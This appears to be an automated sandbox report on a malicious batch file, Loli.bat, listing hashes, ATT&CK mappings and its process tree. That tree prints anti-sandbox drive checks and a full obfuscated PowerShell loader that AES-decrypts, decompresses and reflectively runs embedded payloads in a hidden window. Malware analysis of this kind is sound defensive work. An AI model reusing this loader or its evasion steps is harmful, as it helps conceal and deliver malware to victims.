a35923aa82a712fcca777db5801a1257c6292bffbd3777eb134dcc0ca512ad2c

General

Target

Loli.bat
Size

7.4MB
MD5

20babbe64536c2719410804998fccc16
SHA1

a5de1da0c17e0c5c1af57ead6b6a93b5eabe3435
SHA256

a35923aa82a712fcca777db5801a1257c6292bffbd3777eb134dcc0ca512ad2c
SHA512

6cc9f0f414da1456cc20b2405f70ed4bb30eec7c531e5d9cd55f7e103bc6605dbccc622a04d018314052f975b9089012b4f3bccac7dc2e758fc2c14a95fff0ec
SSDEEP

49152:WotsDKeNxZwx4Jh+7kY1XUYy+iCztYsxVopypue/FgFnRdJhtXZNPsgjrSnJZfHu:A

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2816	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2816	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2816	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2540 wrote to memory of 932	2540	cmd.exe	30
PID 2540 wrote to memory of 932	2540	cmd.exe	30
PID 2540 wrote to memory of 932	2540	cmd.exe	30
PID 2540 wrote to memory of 2260	2540	cmd.exe	31
PID 2540 wrote to memory of 2260	2540	cmd.exe	31
PID 2540 wrote to memory of 2260	2540	cmd.exe	31
PID 2540 wrote to memory of 2592	2540	cmd.exe	32
PID 2540 wrote to memory of 2592	2540	cmd.exe	32
PID 2540 wrote to memory of 2592	2540	cmd.exe	32
PID 2540 wrote to memory of 2544	2540	cmd.exe	33
PID 2540 wrote to memory of 2544	2540	cmd.exe	33
PID 2540 wrote to memory of 2544	2540	cmd.exe	33
PID 2540 wrote to memory of 276	2540	cmd.exe	34
PID 2540 wrote to memory of 276	2540	cmd.exe	34
PID 2540 wrote to memory of 276	2540	cmd.exe	34
PID 2540 wrote to memory of 2816	2540	cmd.exe	35
PID 2540 wrote to memory of 2816	2540	cmd.exe	35
PID 2540 wrote to memory of 2816	2540	cmd.exe	35

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2540
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:932
- C:\Windows\system32\findstr.exe
  findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"
  2⤵
  PID:2260
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:2592
- C:\Windows\system32\findstr.exe
  findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
  2⤵
  PID:2544
- C:\Windows\system32\cmd.exe
  cmd.exe /c echo function UIFF($ORDc){ Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$WnZl=[NMSNMyNMsNMteNMmNM.NMSeNMcNMuNMriNMtyNM.NMCNMryNMpNMtoNMgNMrNMaNMpNMhNMy.NMANMeNMs]NM:NM:NMCrNMeNMaNMtNMeNM()NM;'.Replace('NM', ''); Invoke-Expression -Debug -WarningAction Inquire '$WnZl.Mkyokydkyeky=[kySkyykystkyekymky.Skyeckyukyrkyitkyyky.Ckyrkyykypkytkyokygrkyakypkyhyky.kyCkyipkyhkyekyrkyMkyodkyeky]ky:ky:kyCBkyCky;'.Replace('ky', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore -WarningAction Inquire '$WnZl.PTWaTWdTWdTWinTWgTW=TW[STWyTWsTWteTWm.TWSTWeTWcuTWrTWitTWyTW.TWCTWrTWyTWptTWoTWgTWraTWpTWhTWy.TWPTWaTWdTWdTWinTWgTWMTWoTWdTWe]TW:TW:TWPKTWCTWS7TW;'.Replace('TW', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$WnZl.Kpfepfypf=pf[Spfypfspftepfmpf.pfCopfnvpfepfrpft]pf:pf:FpfrpfopfmpfBpfapfsepf6pf4pfStpfrpfipfngpf("Rpfmpf+pfJpf+npfRpfTpfKhpfrpfUpf0Vpf6fpfbpf0pfiapf2pfmzpfMpf5pfapfXpf0pf1mpfVpfspfxjpfZpfopfKRpffpfwpf7pf0pfg=pf");'.Replace('pf', ''); Invoke-Expression -Verbose -InformationAction Ignore -Debug -WarningAction Inquire '$WnZl.IyVVyV=yV[yVSyyVsyVtyVemyV.yVCyVonyVveyVryVtyV]:yV:yVFryVoyVmyVByVayVsyVe6yV4yVSyVtryViyVnyVg("hyVCyVoyVtyVONyVlyVdyVp5yVlyVpyVKByV3MyVVyVSyVcFyVFyVA=yV=yV");'.Replace('yV', ''); $adfR=$WnZl.CreateDecryptor(); $kYvh=$adfR.TransformFinalBlock($ORDc, 0, $ORDc.Length); $adfR.Dispose(); $WnZl.Dispose(); $kYvh;}function XImN($ORDc){ Invoke-Expression -Debug '$Rbdp=NEueEuwEu-EuObEujEueEuctEu EuSEuysEuteEumEu.EuIOEu.EuMeEumEuoEurEuyEuSEutrEueEuaEum(,$ORDc);'.Replace('Eu', ''); Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$jSFW=NEueEuwEu-EuObEujEueEuctEu EuSEuysEuteEumEu.EuIOEu.EuMeEumEuoEurEuyEuSEutrEueEuaEum;'.Replace('Eu', ''); Invoke-Expression -Verbose '$iTae=NGKeGKwGK-GKObGKjGKeGKctGK GKSGKysGKteGKmGK.GKIOGK.GKCoGKmGKpGKrGKeGKsGKsiGKoGKnGK.GGKZGKiGKpSGKtGKrGKeGKaGKm($Rbdp, [GKIGKOGK.GKCoGKmGKpGKreGKsGKsGKioGKn.GKCGKoGKmpGKrGKesGKsGKiGKoGKnGKMGKodGKeGK]GK::GKDGKeGKcoGKmGKpGKrGKeGKssGK);'.Replace('GK', ''); $iTae.CopyTo($jSFW); $iTae.Dispose(); $Rbdp.Dispose(); $jSFW.Dispose(); $jSFW.ToArray();}function aOfZ($ORDc,$SpfM){ Invoke-Expression -WarningAction Inquire '$rfuo=[bESbEybEsbEtebEmbE.bERebEfbElbEecbEtibEobEnbE.AbEsbEsebEmbEbbElbEybE]bE::bELbEobEadbE([byte[]]$ORDc);'.Replace('bE', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore '$uagQ=$rfuo.EuGnuGtuGruGyPuGouGiuGntuG;'.Replace('uG', ''); Invoke-Expression -InformationAction Ignore '$uagQ.cvIcvncvvcvokcvecv(cv$ncvucvlcvl, $SpfM);'.Replace('cv', '');}$XxfP = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $XxfP;$sLRR=[System.IO.File]::ReadAllText($XxfP).Split([Environment]::NewLine);foreach ($rhpi in $sLRR) { if ($rhpi.StartsWith('Ymxvn')) { $yGcZ=$rhpi.Substring(5); break; }}$fgEN=[string[]]$yGcZ.Split('\');Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire -Verbose '$hcZ = XImN (UIFF ([TeCTeoTenTeveTerTetTe]:Te:TeFTeroTemBTeaTesTee6Te4TeStTerTeiTenTegTe($fgEN[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Te', '');Invoke-Expression -InformationAction Ignore '$VtP = XImN (UIFF ([TeCTeoTenTeveTerTetTe]:Te:TeFTeroTemBTeaTesTee6Te4TeStTerTeiTenTegTe($fgEN[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Te', '');Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Verbose -Debug '$Fzf = XImN (UIFF ([TeCTeoTenTeveTerTetTe]:Te:TeFTeroTemBTeaTesTee6Te4TeStTerTeiTenTegTe($fgEN[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Te', '');aOfZ $hcZ $null;aOfZ $VtP $null;aOfZ $Fzf (,[string[]] (''));
  2⤵
  PID:276
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2816-4-0x000007FEF67BE000-0x000007FEF67BF000-memory.dmp

Filesize
4KB

Download
memory/2816-5-0x000000001B290000-0x000000001B572000-memory.dmp

Filesize
2.9MB

Download
memory/2816-7-0x00000000022A0000-0x00000000022A8000-memory.dmp

Filesize
32KB

Download
memory/2816-6-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2816-9-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2816-8-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2816-10-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download
memory/2816-11-0x000007FEF67BE000-0x000007FEF67BF000-memory.dmp

Filesize
4KB

Download
memory/2816-12-0x000007FEF6500000-0x000007FEF6E9D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing